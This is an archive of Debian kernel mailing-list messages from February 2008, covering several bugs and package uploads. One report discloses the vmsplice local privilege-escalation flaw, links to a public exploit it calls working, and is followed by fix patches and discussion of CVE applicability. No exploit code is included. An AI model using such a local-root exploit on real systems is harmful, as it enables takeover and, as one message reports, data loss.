Package: linux-image-2.6.18-6-686
Version: 2.6.18.dfsg.1-17etch1
Severity: important

There is a bug in vmsplice from 2.6.17 to 2.6.24.1 that can be
exploited by any user process to gain root privileges.

info is here

http://isc.sans.org/newssummary.html

which links to the source code for the exploit here:

http://www.milw0rm.com/exploits/5092

...which has been tested, and works like a charm.

Also here:

http://www.isec.pl/vulnerabilities/isec-0026-vmsplice_to_kernel.txt

...which describes the exploit in more detail.


---End Message---
---BeginMessage---
Source: linux-2.6
Source-Version: 2.6.24-4

We believe that the bug you reported is fixed in the latest version of
linux-2.6, which is due to be installed in the Debian FTP archive:

linux-2.6_2.6.24-4.diff.gz
  to pool/main/l/linux-2.6/linux-2.6_2.6.24-4.diff.gz
linux-2.6_2.6.24-4.dsc
  to pool/main/l/linux-2.6/linux-2.6_2.6.24-4.dsc
linux-doc-2.6.24_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-doc-2.6.24_2.6.24-4_all.deb
linux-headers-2.6.24-1-all-powerpc_2.6.24-4_powerpc.deb
  to 
pool/main/l/linux-2.6/linux-headers-2.6.24-1-all-powerpc_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-all_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-all_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-common_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-common_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
  to 
pool/main/l/linux-2.6/linux-headers-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
  to 
pool/main/l/linux-2.6/linux-headers-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
linux-headers-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
linux-image-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
  to 
pool/main/l/linux-2.6/linux-image-2.6.24-1-powerpc-miboot_2.6.24-4_powerpc.deb
linux-image-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-powerpc-smp_2.6.24-4_powerpc.deb
linux-image-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-powerpc64_2.6.24-4_powerpc.deb
linux-image-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-image-2.6.24-1-powerpc_2.6.24-4_powerpc.deb
linux-libc-dev_2.6.24-4_powerpc.deb
  to pool/main/l/linux-2.6/linux-libc-dev_2.6.24-4_powerpc.deb
linux-manual-2.6.24_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-manual-2.6.24_2.6.24-4_all.deb
linux-patch-debian-2.6.24_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-patch-debian-2.6.24_2.6.24-4_all.deb
linux-source-2.6.24_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-source-2.6.24_2.6.24-4_all.deb
linux-support-2.6.24-1_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-support-2.6.24-1_2.6.24-4_all.deb
linux-tree-2.6.24_2.6.24-4_all.deb
  to pool/main/l/linux-2.6/linux-tree-2.6.24_2.6.24-4_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastian Blank [EMAIL PROTECTED] (supplier of updated linux-2.6 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 11 Feb 2008 12:29:23 +0100
Source: linux-2.6
Binary: linux-source-2.6.24 linux-doc-2.6.24 linux-manual-2.6.24 
linux-patch-debian-2.6.24 linux-tree-2.6.24 linux-support-2.6.24-1 
linux-libc-dev linux-headers-2.6.24-1-all linux-headers-2.6.24-1-all-alpha 
linux-headers-2.6.24-1-common linux-image-2.6.24-1-alpha-generic 
linux-headers-2.6.24-1-alpha-generic linux-image-2.6.24-1-alpha-smp 
linux-headers-2.6.24-1-alpha-smp 

Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread Joey Hess
maximilian attems wrote:
 thanks for quick feedback, have prebuild 2.6.25-rc1-git2
 (they contain the security fix, but don't seem to suspend here)
 anyway please test for boot
 - http://charm.itp.tuwien.ac.at/~mattems/2.6.25-rc1-git2/

Still fails the same.

 if those again don't boot please file info upstream on
 bugzilla.kernel.org so that relevant new x86 arch maintainer
 fix that up.

Um, could the kernel team forward this bug?

* I don't have an account on this bugzilla, or actually, on any bugzilla
  on earth.
* I don't know exactly what versions you've had me test.
* I guess they'll want to know things about compile options that I don't
  know.

-- 
see shy jo


signature.asc
Description: Digital signature


linux-2.6_2.6.22-6.lenny1_i386.changes ACCEPTED

2008-02-12 Thread Debian Installer
Mapping testing-security to testing-proposed-updates.
Warning: ignoring linux-2.6_2.6.22.orig.tar.gz, since it's already in the 
archive.

Accepted:
linux-2.6_2.6.22-6.lenny1.diff.gz
  to pool/main/l/linux-2.6/linux-2.6_2.6.22-6.lenny1.diff.gz
linux-2.6_2.6.22-6.lenny1.dsc
  to pool/main/l/linux-2.6/linux-2.6_2.6.22-6.lenny1.dsc
linux-doc-2.6.22_2.6.22-6.lenny1_all.deb
  to pool/main/l/linux-2.6/linux-doc-2.6.22_2.6.22-6.lenny1_all.deb
linux-headers-2.6.22-3-486_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.22-3-486_2.6.22-6.lenny1_i386.deb
linux-headers-2.6.22-3-686-bigmem_2.6.22-6.lenny1_i386.deb
  to 
pool/main/l/linux-2.6/linux-headers-2.6.22-3-686-bigmem_2.6.22-6.lenny1_i386.deb
linux-headers-2.6.22-3-686_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.22-3-686_2.6.22-6.lenny1_i386.deb
linux-headers-2.6.22-3-all-i386_2.6.22-6.lenny1_i386.deb
  to 
pool/main/l/linux-2.6/linux-headers-2.6.22-3-all-i386_2.6.22-6.lenny1_i386.deb
linux-headers-2.6.22-3-all_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.22-3-all_2.6.22-6.lenny1_i386.deb
linux-headers-2.6.22-3-amd64_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.22-3-amd64_2.6.22-6.lenny1_i386.deb
linux-headers-2.6.22-3-k7_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.22-3-k7_2.6.22-6.lenny1_i386.deb
linux-headers-2.6.22-3-vserver-686_2.6.22-6.lenny1_i386.deb
  to 
pool/main/l/linux-2.6/linux-headers-2.6.22-3-vserver-686_2.6.22-6.lenny1_i386.deb
linux-headers-2.6.22-3-vserver-k7_2.6.22-6.lenny1_i386.deb
  to 
pool/main/l/linux-2.6/linux-headers-2.6.22-3-vserver-k7_2.6.22-6.lenny1_i386.deb
linux-headers-2.6.22-3-vserver_2.6.22-6.lenny1_i386.deb
  to 
pool/main/l/linux-2.6/linux-headers-2.6.22-3-vserver_2.6.22-6.lenny1_i386.deb
linux-headers-2.6.22-3_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-headers-2.6.22-3_2.6.22-6.lenny1_i386.deb
linux-image-2.6.22-3-486_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-image-2.6.22-3-486_2.6.22-6.lenny1_i386.deb
linux-image-2.6.22-3-686-bigmem_2.6.22-6.lenny1_i386.deb
  to 
pool/main/l/linux-2.6/linux-image-2.6.22-3-686-bigmem_2.6.22-6.lenny1_i386.deb
linux-image-2.6.22-3-686_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-image-2.6.22-3-686_2.6.22-6.lenny1_i386.deb
linux-image-2.6.22-3-amd64_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-image-2.6.22-3-amd64_2.6.22-6.lenny1_i386.deb
linux-image-2.6.22-3-k7_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-image-2.6.22-3-k7_2.6.22-6.lenny1_i386.deb
linux-image-2.6.22-3-vserver-686_2.6.22-6.lenny1_i386.deb
  to 
pool/main/l/linux-2.6/linux-image-2.6.22-3-vserver-686_2.6.22-6.lenny1_i386.deb
linux-image-2.6.22-3-vserver-k7_2.6.22-6.lenny1_i386.deb
  to 
pool/main/l/linux-2.6/linux-image-2.6.22-3-vserver-k7_2.6.22-6.lenny1_i386.deb
linux-libc-dev_2.6.22-6.lenny1_i386.deb
  to pool/main/l/linux-2.6/linux-libc-dev_2.6.22-6.lenny1_i386.deb
linux-manual-2.6.22_2.6.22-6.lenny1_all.deb
  to pool/main/l/linux-2.6/linux-manual-2.6.22_2.6.22-6.lenny1_all.deb
linux-patch-debian-2.6.22_2.6.22-6.lenny1_all.deb
  to pool/main/l/linux-2.6/linux-patch-debian-2.6.22_2.6.22-6.lenny1_all.deb
linux-source-2.6.22_2.6.22-6.lenny1_all.deb
  to pool/main/l/linux-2.6/linux-source-2.6.22_2.6.22-6.lenny1_all.deb
linux-support-2.6.22-3_2.6.22-6.lenny1_all.deb
  to pool/main/l/linux-2.6/linux-support-2.6.22-3_2.6.22-6.lenny1_all.deb
linux-tree-2.6.22_2.6.22-6.lenny1_all.deb
  to pool/main/l/linux-2.6/linux-tree-2.6.22_2.6.22-6.lenny1_all.deb


Override entries for your package:
linux-2.6_2.6.22-6.lenny1.dsc - source devel
linux-doc-2.6.22_2.6.22-6.lenny1_all.deb - optional doc
linux-headers-2.6.22-3-486_2.6.22-6.lenny1_i386.deb - optional devel
linux-headers-2.6.22-3-686-bigmem_2.6.22-6.lenny1_i386.deb - optional devel
linux-headers-2.6.22-3-686_2.6.22-6.lenny1_i386.deb - optional devel
linux-headers-2.6.22-3-all-i386_2.6.22-6.lenny1_i386.deb - optional devel
linux-headers-2.6.22-3-all_2.6.22-6.lenny1_i386.deb - optional devel
linux-headers-2.6.22-3-amd64_2.6.22-6.lenny1_i386.deb - optional devel
linux-headers-2.6.22-3-k7_2.6.22-6.lenny1_i386.deb - optional devel
linux-headers-2.6.22-3-vserver-686_2.6.22-6.lenny1_i386.deb - optional devel
linux-headers-2.6.22-3-vserver-k7_2.6.22-6.lenny1_i386.deb - optional devel
linux-headers-2.6.22-3-vserver_2.6.22-6.lenny1_i386.deb - optional devel
linux-headers-2.6.22-3_2.6.22-6.lenny1_i386.deb - optional devel
linux-image-2.6.22-3-486_2.6.22-6.lenny1_i386.deb - optional admin
linux-image-2.6.22-3-686-bigmem_2.6.22-6.lenny1_i386.deb - optional admin
linux-image-2.6.22-3-686_2.6.22-6.lenny1_i386.deb - optional admin
linux-image-2.6.22-3-amd64_2.6.22-6.lenny1_i386.deb - optional admin
linux-image-2.6.22-3-k7_2.6.22-6.lenny1_i386.deb - optional admin
linux-image-2.6.22-3-vserver-686_2.6.22-6.lenny1_i386.deb - optional admin
linux-image-2.6.22-3-vserver-k7_2.6.22-6.lenny1_i386.deb - optional admin

Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-12 Thread Bastian Blank
On Tue, Feb 12, 2008 at 07:01:58PM +0100, Florian Weimer wrote:
 For the record, the above hunk is unnecessary because the get_user()
 calls which immediately follow the quoted code perform implict
 access_ok() checks.  CVE-2008-0010 does NOT apply to our 2.6.18 kernel
 (but the additional access_ok() call doesn't cause any harm, either).

Looks like I missread a comment. I rechecked it and it does the check.

Bastian

-- 
No problem is insoluble.
-- Dr. Janet Wallace, The Deadly Years, stardate 3479.4



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

2008-02-12 Thread Florian Weimer
* Bastian Blank:

 diff --git a/fs/splice.c b/fs/splice.c
 index 684bca3..2d7e598 100644
 --- a/fs/splice.c
 +++ b/fs/splice.c
 @@ -1122,6 +1122,11 @@ static int get_iovec_page_array(const struct iovec 
 __user *iov,
   size_t len;
   int i;
  
 + if (!access_ok(VERIFY_READ, iov, sizeof(struct iovec))) {
 + error = -EFAULT;
 + break;
 + }
 +
   /*
* Get user address base and length for this iovec.
*/

For the record, the above hunk is unnecessary because the get_user()
calls which immediately follow the quoted code perform implict
access_ok() checks.  CVE-2008-0010 does NOT apply to our 2.6.18 kernel
(but the additional access_ok() call doesn't cause any harm, either).

I'm writing this because some vendors have released pre-2.6.23 patches
without this hunk, and I don't want to create impression they are still
vulnerable.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread H. Peter Anvin
Thought some more about this, and since this probably means gcc will 
generate this for userspace code as well nowadays, tm5800 should 
probably be downgraded to a 586-class machine.  Hence the Linux policy 
of promoting it to a 686-class machine for having CMOV is actually 
incorrect, it doesn't have all the userspace-visible features of a 
686-class machine, lacking long NOP.


-hpa

diff --git a/arch/x86/kernel/cpu/transmeta.c b/arch/x86/kernel/cpu/transmeta.c
index 200fb3f..e8b422c 100644
--- a/arch/x86/kernel/cpu/transmeta.c
+++ b/arch/x86/kernel/cpu/transmeta.c
@@ -76,13 +76,6 @@ static void __cpuinit init_transmeta(struct cpuinfo_x86 *c)
/* All Transmeta CPUs have a constant TSC */
set_bit(X86_FEATURE_CONSTANT_TSC, c-x86_capability);

-   /* If we can run i686 user-space code, call us an i686 */
-#define USER686 ((1  X86_FEATURE_TSC)|\
-(1  X86_FEATURE_CX8)|\
-(1  X86_FEATURE_CMOV))
-if (c-x86 == 5  (c-x86_capability[0]  USER686) == USER686)
-   c-x86 = 6;
-
 #ifdef CONFIG_SYSCTL
/* randomize_va_space slows us down enormously;
   it probably triggers retranslation of x86-native bytecode */


Bug#465506: marked as done (Warnings compiling linux-source-2.6.24)

2008-02-12 Thread Debian Bug Tracking System

Your message dated Tue, 12 Feb 2008 22:06:37 +0100
with message-id [EMAIL PROTECTED]
and subject line Re: Bug#465506: Warnings compiling linux-source-2.6.24
has caused the Debian Bug report #465506,
regarding Warnings compiling linux-source-2.6.24
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465506: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465506
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: linux-source-2.6.24
Version: 2.6.24-4

When I compile the kernel and modules from linux-source-2.6.24-4 I
receive the following warning:
arch/x86/kernel/setup64.c: In function ‘setup_per_cpu_areas’:
arch/x86/kernel/setup64.c:103: warning: the address of
‘contig_page_data’ will always evaluate as ‘true’



$ cd /usr/src/linux-source-2.6.24
$ make-kpkg --revision=2.6.24.custom binary modules_image
arch/x86/kernel/setup64.c: In function ‘setup_per_cpu_areas’:
arch/x86/kernel/setup64.c:103: warning: the address of
‘contig_page_data’ will always evaluate as ‘true’

I don't think this is very severe, it might just be that it has to be
'config_page_data' instead of 'contig_page_data'.

I am using Debian GNU/Linux lenny/sid, kernel 2.6.24-1-amd64 and glibc
2.7-6 (libc6_2.7-6_amd64)

Cheers!


---End Message---
---BeginMessage---
On Tue, Feb 12, 2008 at 10:37:08PM +0100, Max Zimmermann wrote:
 Package: linux-source-2.6.24
 Version: 2.6.24-4
 
 When I compile the kernel and modules from linux-source-2.6.24-4 I
 receive the following warning:
 arch/x86/kernel/setup64.c: In function ???setup_per_cpu_areas???:
 arch/x86/kernel/setup64.c:103: warning: the address of
 ???contig_page_data??? will always evaluate as ???true???
 
 
 
 $ cd /usr/src/linux-source-2.6.24
 $ make-kpkg --revision=2.6.24.custom binary modules_image
 arch/x86/kernel/setup64.c: In function ???setup_per_cpu_areas???:
 arch/x86/kernel/setup64.c:103: warning: the address of
 ???contig_page_data??? will always evaluate as ???true???
 
 I don't think this is very severe, it might just be that it has to be
 'config_page_data' instead of 'contig_page_data'.
 
 I am using Debian GNU/Linux lenny/sid, kernel 2.6.24-1-amd64 and glibc
 2.7-6 (libc6_2.7-6_amd64)

gcc version would have been more important.

anyway that bug report does not belong in the debian bug tracking
system. the linux-2.6 has always had warnings, most of them get
fixed over time. please work with upstream if you care.
closing as invalid request.

thanks

---End Message---


Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread H. Peter Anvin

maximilian attems wrote:


sure, ack.
so i'll circumvent bugzilla and add the new x86 maintainers
on cc to let them know about the 2.6.24 and 2.6.25-rc1 boot error
on shiny fujitsu p700 lifebook, with a Crusoe processor.
http://bugs.debian.org/464962
686 config attached.



INT 6 is #UD, undefined instruction.

If you could send me a copy of your vmlinux file (not bzImage), it would 
speed things up.


I happen to have an old TM5800-based machine sitting around, so I can 
probably reproduce it.


-hpa



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464523: linux-image-2.6.24-1-amd64: b43 needs patches for kernel 2.6.24

2008-02-12 Thread maximilian attems
On Tue, Feb 12, 2008 at 08:37:59PM +0100, Andreas Richter wrote:
 Am Montag, 11. Februar 2008 23:06:21 schrieb maximilian attems:
 b43 doesn't work here with 2.6.24.1 either :(

ok so please install kerneloops,  let it report upstream,
quick edit in /etc/kerneloops.conf and reboot into faulty kernel.
so upstream will be notified on your oops.
 
 When i boot my own kernel (2.6.24) with patches the modprobe ssb (on startup 
 or on console) loads the b43 module also.
 When i try an modprobe ssb i became the following output:
 
 ACPI: PCI Interrupt :30:00.0[A] - GSI 18 (level, low) - IRQ 18
 PCI: Setting latency timer of device :30:00.0 to 64
 ssb: SPROM revision 3 detected.
 ssb: Sonics Silicon Backplane found on PCI device :30:00.0
 b43-phy2: Broadcom 4311 WLAN found
 phy2: Selected rate control algorithm 'simple'
 input: b43-phy2 as /class/input/input14
 Registered led device: b43-phy2:tx
 Registered led device: b43-phy2:rx
 Registered led device: b43-phy2:radio
 
 After that the wlan works ok.
 
 But on the 2.6.24.1 kernel i became the following output on modprobe ssb:
 
 ACPI: PCI Interrupt :30:00.0[A] - GSI 18 (level, low) - IRQ 18
 PCI: Setting latency timer of device :30:00.0 to 64
 WARNING: at drivers/ssb/main.c:883 ssb_tmslow_reject_bitmask()
 Pid: 3847, comm: modprobe Tainted: P2.6.24-1-amd64 #1
 
 Call Trace:
  [880527cd] :ssb:ssb_tmslow_reject_bitmask+0x4a/0x53
  [8805303d] :ssb:ssb_device_is_enabled+0xf/0x3b
  [880551ba] :ssb:ssb_pcicore_init+0x19/0x4a
  [88052544] :ssb:ssb_attach_queued_buses+0x9a/0x294
  [88053ce0] :ssb:ssb_pci_get_invariants+0x0/0x2b7
  [88052b53] :ssb:ssb_bus_register+0x13d/0x1ac
  [88052c72] :ssb:ssb_bus_pcibus_register+0x2a/0x4b
  [880545a1] :ssb:ssb_pcihost_probe+0x6f/0x9e
  [8031d400] pci_device_probe+0xd1/0x138
  [80379dda] driver_probe_device+0xf7/0x174
  [80379ef9] __driver_attach+0x0/0x92
  [80379f53] __driver_attach+0x5a/0x92
  [803791c6] bus_for_each_dev+0x43/0x6e
  [80379546] bus_add_driver+0x77/0x1be
  [8031d5d9] __pci_register_driver+0x58/0x8a
  [88031045] :ssb:ssb_modinit+0x45/0x5d
  [80256ae8] sys_init_module+0x16e3/0x1821
  [8020be2e] system_call+0x7e/0x83
 
 ssb: Sonics Silicon Backplane found on PCI device :30:00.0
 
 
 That looks different. 
 It seems that ssb doesn't detect the Broadcom device.

i don't like the tainted flag, why does that come?
 
  thanks
 
 No worries. 
 Hope my input helps to fix the problem.

adding b43 MAINTAINERS on cc to let them know.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



initramfs-tools_0.91e_amd64.changes ACCEPTED

2008-02-12 Thread Debian Installer

Accepted:
initramfs-tools_0.91e.dsc
  to pool/main/i/initramfs-tools/initramfs-tools_0.91e.dsc
initramfs-tools_0.91e.tar.gz
  to pool/main/i/initramfs-tools/initramfs-tools_0.91e.tar.gz
initramfs-tools_0.91e_all.deb
  to pool/main/i/initramfs-tools/initramfs-tools_0.91e_all.deb


Override entries for your package:
initramfs-tools_0.91e.dsc - source utils
initramfs-tools_0.91e_all.deb - optional utils

Announcing to [EMAIL PROTECTED]
Closing bugs: 458772 


Thank you for your contribution to Debian.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processing of initramfs-tools_0.91e_amd64.changes

2008-02-12 Thread Archive Administrator
initramfs-tools_0.91e_amd64.changes uploaded successfully to localhost
along with the files:
  initramfs-tools_0.91e.dsc
  initramfs-tools_0.91e.tar.gz
  initramfs-tools_0.91e_all.deb

Greetings,

Your Debian queue daemon


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: This looks familiar

2008-02-12 Thread Graham
See also Debian bug #463606.

-- graham



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465278: linux-image-2.6.24-1-powerpc: appletouch failure upon resume after suspend2ram

2008-02-12 Thread Cyril Brulebois
On 12/02/2008, maximilian attems wrote:
 can you please test 2.6.24-4 it had some usb stable fixes, along
 important security.

I knew about the security fixes, but the appletouch/usb bug is still
here, reproducible upon the first suspend/resume test, with the very
same error message.

Cheers,

-- 
Cyril Brulebois

PS: Sending again, the bounce didn't reach the BTS either, sorry for
possible duplicates.


pgpaNffi7Ukbt.pgp
Description: PGP signature


Bug#465225: closed by maximilian attems [EMAIL PROTECTED] (Re: Bug#465225: No bluetooth or wan control in /proc/acpi/ibm in kernel 2.6.24-1-686)

2008-02-12 Thread David Noble
Although the suggested solution with bluetooth appears to work without
further issues, there are still issues with regards to controlling the
WWAN card. It is still fully functional, but it is not possible to turn
it off the way it was done previously; as neither the suggested
/sys/devices/platform/thinkpad_acpi/wwan_enable, the legacy
/proc/acpi/ibm/wan or anything resembling it appear to exist.

For further reference, there does appear to be a workaround to disable 
the radio in the modem:
echo at+cfun=0  /dev/ttyUSB0  (replace with first USB TTY of your modem) 
turns off the radio.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464523: linux-image-2.6.24-1-amd64: b43 needs patches for kernel 2.6.24

2008-02-12 Thread Andreas Richter
Am Montag, 11. Februar 2008 23:06:21 schrieb maximilian attems:
 2.6.24.1 got pushed out with b43 stable queue patches,
 can we have a feedback on it?

b43 doesn't work here with 2.6.24.1 either :(

When i boot my own kernel (2.6.24) with patches the modprobe ssb (on startup 
or on console) loads the b43 module also.
When i try an modprobe ssb i became the following output:

ACPI: PCI Interrupt :30:00.0[A] - GSI 18 (level, low) - IRQ 18
PCI: Setting latency timer of device :30:00.0 to 64
ssb: SPROM revision 3 detected.
ssb: Sonics Silicon Backplane found on PCI device :30:00.0
b43-phy2: Broadcom 4311 WLAN found
phy2: Selected rate control algorithm 'simple'
input: b43-phy2 as /class/input/input14
Registered led device: b43-phy2:tx
Registered led device: b43-phy2:rx
Registered led device: b43-phy2:radio

After that the wlan works ok.

But on the 2.6.24.1 kernel i became the following output on modprobe ssb:

ACPI: PCI Interrupt :30:00.0[A] - GSI 18 (level, low) - IRQ 18
PCI: Setting latency timer of device :30:00.0 to 64
WARNING: at drivers/ssb/main.c:883 ssb_tmslow_reject_bitmask()
Pid: 3847, comm: modprobe Tainted: P2.6.24-1-amd64 #1

Call Trace:
 [880527cd] :ssb:ssb_tmslow_reject_bitmask+0x4a/0x53
 [8805303d] :ssb:ssb_device_is_enabled+0xf/0x3b
 [880551ba] :ssb:ssb_pcicore_init+0x19/0x4a
 [88052544] :ssb:ssb_attach_queued_buses+0x9a/0x294
 [88053ce0] :ssb:ssb_pci_get_invariants+0x0/0x2b7
 [88052b53] :ssb:ssb_bus_register+0x13d/0x1ac
 [88052c72] :ssb:ssb_bus_pcibus_register+0x2a/0x4b
 [880545a1] :ssb:ssb_pcihost_probe+0x6f/0x9e
 [8031d400] pci_device_probe+0xd1/0x138
 [80379dda] driver_probe_device+0xf7/0x174
 [80379ef9] __driver_attach+0x0/0x92
 [80379f53] __driver_attach+0x5a/0x92
 [803791c6] bus_for_each_dev+0x43/0x6e
 [80379546] bus_add_driver+0x77/0x1be
 [8031d5d9] __pci_register_driver+0x58/0x8a
 [88031045] :ssb:ssb_modinit+0x45/0x5d
 [80256ae8] sys_init_module+0x16e3/0x1821
 [8020be2e] system_call+0x7e/0x83

ssb: Sonics Silicon Backplane found on PCI device :30:00.0


That looks different. 
It seems that ssb doesn't detect the Broadcom device.

 thanks

No worries. 
Hope my input helps to fix the problem.


-- 
Andreas Richter 
URLs: http://ar.oszine.de | http://www.oszine.de
GPG-KeyID: 0x7BA12DD9
Fingerprint: D2E9 202B F4F0 EB16 25DE 5FF7 0CF2 3C57 7BA1 2DD9


signature.asc
Description: This is a digitally signed message part.


Bug#463606: 2.6.25-rc1-git2 fails similarly

2008-02-12 Thread Graham
I stumbled upon bug 464962 a short while ago, and decided to try the
2.6.25-rc1-git2 image suggested there:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464962#25

I've only tried the -686 flavour. It fails similarly to 2.6.24-686. I
will attach a screen capture; sorry, no time to transcribe it right
now.

-- graham
attachment: bug-2.6.25-rc1-git2.png

Bug#436267: Firewire support in lenny

2008-02-12 Thread Guus Sliepen
On Tue, Feb 12, 2008 at 02:38:13PM +0100, maximilian attems wrote:

  My IIDC cameras do not work correctly with a juju-enabled libdc1394
  2.0.1. Furthermore, apart from coriander there are no applications that
  have migrated from libdc1394 v1 to v2.
 
 even with 2.6.24-4 linux images?
 please mention the uname of your tests

I'll see if I can do the tests on a clean install with the latest linux
images tomorrow.

 if you are on amd64 2.6.25-rc1-git2
 - http://photon.itp.tuwien.ac.at/~mattems/
 will build i686 during day (takes much longer)
 
 please if 2.6.24 has troubles feedback on that one.

I'll try both in any case.

[...]
 you can't have both without blacklisting one otherwise udev loads
 randomly from boot to boot other firewire stack. changing blacklist
 files in /etc/modprobe.d is trivial.

I agree. I'm just asking that the old stack will be blacklisted, but
still available in the linux images.

-- 
Met vriendelijke groet / with kind regards,
  Guus Sliepen [EMAIL PROTECTED]


signature.asc
Description: Digital signature


Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread maximilian attems
On Sun, 10 Feb 2008, Joey Hess wrote:

 maximilian attems wrote:
  i haven't yet compiled latest git21 (will do later today), in the
  menatime i have i386 snapshots of git15, can you try there the -686
  http://charm.itp.tuwien.ac.at/~mattems/git15/
  if upstream fixed this bug inbetween?
 
 Nope, still fails.

thanks for quick feedback, have prebuild 2.6.25-rc1-git2
(they contain the security fix, but don't seem to suspend here)
anyway please test for boot
- http://charm.itp.tuwien.ac.at/~mattems/2.6.25-rc1-git2/

if those again don't boot please file info upstream on
bugzilla.kernel.org so that relevant new x86 arch maintainer
fix that up.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464953: The exploit corrupted the system partition

2008-02-12 Thread n0p
Just FYI
The exploit corrupted the system partition (reiserFS), a user in my server
tested the exploit and all the root got corrupted and impossible to recover.
It was a fully updated Debian Testing using the debian default kernel in a
fully stable pentium4 otherwise.

Next time i'll use the grsec patches and lock the fuck up of my users ¬¬


Processed: Re: Bug#465510: linux-image-2.6.24.2: r8169 doesn't work with 2.6.24.2

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 reassign 465510 linux-2.6
Bug#465510: linux-image-2.6.24.2: r8169 doesn't work with 2.6.24.2
Warning: Unknown package 'linux-image-2.6.24.2'
Bug reassigned from package `linux-image-2.6.24.2' to `linux-2.6'.

 --
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465512: linux-image-2.6.18-6-amd64: broken symlink /lib/modules/2.6.18-6-amd64/source

2008-02-12 Thread Bastian Blank
On Tue, Feb 12, 2008 at 11:43:46PM +0100, maximilian attems wrote:
 thanks for reminder, nuked that useless warning for 2.6.25-1
 very harmless.

It is a left over from make-kpkg usage.

Bastian

-- 
All your people must learn before you can reach for the stars.
-- Kirk, The Gamesters of Triskelion, stardate 3259.2



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
